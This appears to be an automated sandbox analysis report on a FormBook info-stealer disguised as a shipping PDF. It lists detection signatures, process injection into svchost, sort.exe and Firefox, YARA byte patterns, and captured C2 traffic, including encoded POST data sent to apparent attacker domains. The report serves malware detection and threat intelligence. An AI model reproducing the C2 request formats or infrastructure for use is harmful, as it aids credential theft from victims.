
Windows Analysis Report
shipping notification_pdf.exe

Overview

General Information

Sample name: shipping notification_pdf.exe
Analysis ID: 1520196
MD5: d9e239c79f89ec481ec939d7f784c89e
SHA1: 9b83acaa385abba92e8d3566479578af4fcdd954
SHA256: 0ef342eee9167ec78306dabdd82b0c41f34f1e3ed7d35676a602735497d72101
Tags: exe, Formbook, user-threatcat_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • shipping notification_pdf.exe (PID: 8 cmdline: "C:\Users\user\Desktop\shipping notification_pdf.exe" MD5: D9E239C79F89EC481EC939D7F784C89E)
    • svchost.exe (PID: 6912 cmdline: "C:\Users\user\Desktop\shipping notification_pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • AVyNLNHPrma.exe (PID: 1224 cmdline: "C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sort.exe (PID: 1252 cmdline: "C:\Windows\SysWOW64\sort.exe" MD5: D0D6250804C3102A17051406BBDBF3D6)
          • AVyNLNHPrma.exe (PID: 2340 cmdline: "C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3312 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2bb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x13c6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2ee63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x16f52:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -

Source | Rule | Description | Author | Strings
8.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
8.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2ee63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x16f52:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
8.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | -
8.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown | 0x2e063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55; 0x16152:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\shipping notification_pdf.exe", CommandLine: "C:\Users\user\Desktop\shipping notification_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping notification_pdf.exe", ParentImage: C:\Users\user\Desktop\shipping notification_pdf.exe, ParentProcessId: 8, ParentProcessName: shipping notification_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping notification_pdf.exe", ProcessId: 6912, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\shipping notification_pdf.exe", CommandLine: "C:\Users\user\Desktop\shipping notification_pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\shipping notification_pdf.exe", ParentImage: C:\Users\user\Desktop\shipping notification_pdf.exe, ParentProcessId: 8, ParentProcessName: shipping notification_pdf.exe, ProcessCommandLine: "C:\Users\user\Desktop\shipping notification_pdf.exe", ProcessId: 6912, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: shipping notification_pdf.exe, Avira: detected
Source: shipping notification_pdf.exe, ReversingLabs: Detection: 31%
Source: Yara match, File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: shipping notification_pdf.exe, Joe Sandbox ML: detected
Source: shipping notification_pdf.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: sort.pdb, source: svchost.exe, 00000008.00000003.1508760491.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549522108.0000000003000000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000002.3141930342.0000000001098000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000003.1829074625.00000000010AB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb, source: AVyNLNHPrma.exe, 0000000A.00000002.3134753679.000000000003E000.00000002.00000001.01000000.00000005.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614506571.000000000003E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: wntdll.pdbUGP, source: svchost.exe, 00000008.00000002.1549858763.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1440694217.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1438499265.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1549372724.000000000370C000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1541316835.000000000352D000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb, source: svchost.exe, svchost.exe, 00000008.00000002.1549858763.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1440694217.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1438499265.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, sort.exe, sort.exe, 0000000B.00000003.1549372724.000000000370C000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1541316835.000000000352D000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: svchost.pdb, source: sort.exe, 0000000B.00000002.3146431327.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000002EDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.000000003615C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: sort.pdbGCTL, source: svchost.exe, 00000008.00000003.1508760491.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549522108.0000000003000000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000002.3141930342.0000000001098000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000003.1829074625.00000000010AB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP, source: sort.exe, 0000000B.00000002.3146431327.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000002EDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.000000003615C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Windows\SysWOW64\sort.exe, Code function: 11_2_02F8C040: FindFirstFileW, FindNextFileW, FindClose
Source: C:\Windows\SysWOW64\sort.exe, Code function: 4x nop then xor eax, eax (11_2_02F79B00)
Source: C:\Windows\SysWOW64\sort.exe, Code function: 4x nop then pop edi (11_2_02F92108)
Source: C:\Windows\SysWOW64\sort.exe, Code function: 4x nop then mov ebx, 00000004h (11_2_037B04E8)
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe, Code function: 4x nop then xor eax, eax (12_2_0532A86F)
Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe, Code function: 4x nop then pop edi (12_2_05326088)
Source: C:\Program Files\Mozilla Firefox\firefox.exe, Code function: 4x nop then mov ebx, 00000004h (14_2_00000221B5F324E8)
Source: Joe Sandbox View, IP Address: 13.248.169.48
Source: Joe Sandbox View, IP Address: 208.91.197.27
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /w2z7/?3h-p=N9vxY/BiH9CUPRIyAeGfJVJpgq7WjV4m4CgUXf3o6/BdznXYzsjphhYZEJkNcKLxLeXc17863lrPM6vanLJ7s3GZsr4LBR9+XIJ5iKj/YnCcrwekjQRW3tXz8P3xMqQF6fEDN8pz57Wi&yP=MxXHdlzpQrd0 HTTP/1.1 | Host: www.antura.partners | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /jnnq/?3h-p=NmFuEDzr5eFeCtWuKkyDdAT5pBmHANp/LwRnUjqHn3UIHiNVBdr0a0hC8Uo/xX06NEvduSSve8RMIpwru4iaTurXZ5DXU8xUW0YmSfLMnmzzx/fpl3VzGsdmuXcon1eA2keAu/eSz0b3&yP=MxXHdlzpQrd0 HTTP/1.1 | Host: www.skystargazeguide.store | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /aqh8/?3h-p=5+U/B9yLCC3fujBRlYTV20I98PveYGmvCXYzu/ftmHOnFysm+UcobObnCUFXWy45RBneaC03tE6NiMazv36XsdX71yQuORGTyAJPqKJQT0rpdkIxSLnsafg/tkq0RYEKr7ZU9FsrwT/u&yP=MxXHdlzpQrd0 HTTP/1.1 | Host: www.nmh6.site | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /3632/?3h-p=ZDryfjaLHwBnUqUAz7hpA2/hGP9eBzcfaY0viGDquKnLcTlAkmYuk/6M1OA81aiy+KGhBNQ+dZL2mYOFdSjHVEkLIW4t6KqykiPMJAC2aOGuo8j7gvO+xYI762/FZxSPjSE16ayWeec3&yP=MxXHdlzpQrd0 HTTP/1.1 | Host: www.sapatarias.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /05bk/?3h-p=7slq6roGbUYIGCZK/AHLAj192Fgd/VphPEARDFaBZgyILhyhf/dU1Jg1HH64YML39LGaxm9NI1GZWNYUnLUXyXLdbmUNBKZzgEadXvwwUw5uXrkOz5o90nGwS6h8GF9GBt2NTtUZfNeM&yP=MxXHdlzpQrd0 HTTP/1.1 | Host: www.softillery.info | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /43nw/?yP=MxXHdlzpQrd0&3h-p=TRrwt1Lp84Si32vs8BwRNNCulMjKfdr7iMjgkGLejtYz7grWw7bT5zKsM4PORiqIxohG3+sDrwsXXfU947RLBQy8IxkH7FUKKiRlKageAzPI0SYRDznkpg/s6UBWT6V3P6UmeH8wgKTy HTTP/1.1 | Host: www.asiapartnars.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /orig/?3h-p=r9s+/C+7L0qcfQ3EbyhZ2kI2mfDPPCLNOvfr7UsjKcZTLpRbSSlLUqZEJhqx10+0pCoVRF7rGimcnTkgfg8ZHeQ80zp2CbjJ0RatJE7Uf95oksT4wdlZdM+V6Ku6rQ/6CIovtXlWMzNh&yP=MxXHdlzpQrd0 HTTP/1.1 | Host: www.priunit.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic, HTTP traffic detected: GET /f1ix/?yP=MxXHdlzpQrd0&3h-p=XM9sfp65sOuZec3epxclxXWBBJUxihMAWCEUh5QnoqUyn2hC2VtWHeU5uGoB1wM4jZ7A0DLpmey/hCRFZeGEvj7q7XX5xre7uRYqBHdA1EhC2MbHvHm0Xc1CAhLH+Ul8oOX24/wUyER6 HTTP/1.1 | Host: www.consultarfacil.online | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-us | Connection: close | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36
Source: global traffic, DNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
Source: global traffic, DNS traffic detected: DNS query: www.48vlu.shop
Source: global traffic, DNS traffic detected: DNS query: www.antura.partners
Source: global traffic, DNS traffic detected: DNS query: www.skystargazeguide.store
Source: global traffic, DNS traffic detected: DNS query: www.nmh6.site
Source: global traffic, DNS traffic detected: DNS query: www.sapatarias.online
Source: global traffic, DNS traffic detected: DNS query: www.softillery.info
Source: global traffic, DNS traffic detected: DNS query: www.asiapartnars.online
Source: global traffic, DNS traffic detected: DNS query: www.priunit.online
Source: global traffic, DNS traffic detected: DNS query: www.consultarfacil.online
Source: global traffic, DNS traffic detected: DNS query: www.exhibitarrange.shop
Source: unknown, HTTP traffic detected: POST /jnnq/ HTTP/1.1 | Host: www.skystargazeguide.store | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Encoding: gzip, deflate, br | Accept-Language: en-us | Origin: http://www.skystargazeguide.store | Content-Length: 217 | Connection: close | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Referer: http://www.skystargazeguide.store/jnnq/ | User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) coc_coc_browser/47.0 Chrome/41.0.2272.107 Safari/537.36 | Data Ascii: 3h-p=AktOH2f76OxBG9ujShKjJACEnAS4aPAbAVguTBCIvUg1dhEXdKHGSHtN3lw80Gw0VGP3sBunGe1aLohJj5rFFNjRVqHHfOhyOVcUQ4KVt03WucXmjkdodfMlmE4N9ACX4mjiz/iC7Se7jUpzYSR+26yWr0e1NwnAovSf9YToNeRrnm5OJbuRgbKetCkHPxpmlzV6HmQPr/Dpc6m9ww==
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Fri, 27 Sep 2024 04:35:16 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Fri, 27 Sep 2024 04:35:18 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Fri, 27 Sep 2024 04:35:21 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Fri, 27 Sep 2024 04:35:24 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | Data Ascii: 120<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.skystargazeguide.store Port 80</address></body></html>0
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 27 Sep 2024 04:36:43 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 27 Sep 2024 04:36:46 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 27 Sep 2024 04:36:49 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 27 Sep 2024 04:36:51 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 389 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Caddy | Date: Fri, 27 Sep 2024 04:37:11 GMT | Content-Length: 0 | Connection: close
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Caddy | Date: Fri, 27 Sep 2024 04:37:13 GMT | Content-Length: 0 | Connection: close
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Server: Caddy | Date: Fri, 27 Sep 2024 04:37:17 GMT | Content-Length: 0 | Connection: close
            Source: sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.antura.partners/px.js?ch=1
            Source: sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.antura.partners/px.js?ch=2
            Source: sort.exe, 0000000B.00000002.3147958771.00000000066D0000.00000004.00000800.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000003456000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.antura.partners/sk-logabpstatus.php?a=K3ZvUk8rMHZ6cWJBTjJIV04zS2R2RnBlczJZWldicnJFSmlpMmp
            Source: AVyNLNHPrma.exe, 0000000C.00000002.3146774474.0000000005370000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.exhibitarrange.shop
            Source: AVyNLNHPrma.exe, 0000000C.00000002.3146774474.0000000005370000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.exhibitarrange.shop/yxqi/
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: firefox.exe, 0000000E.00000002.1911274268.00000000366D6000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sort.exe, 0000000B.00000003.1803504970.000000000819D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_a
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2#b
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: sort.exe, 0000000B.00000002.3137911824.0000000003449000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sort.exe, 0000000B.00000003.1796990827.0000000008175000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
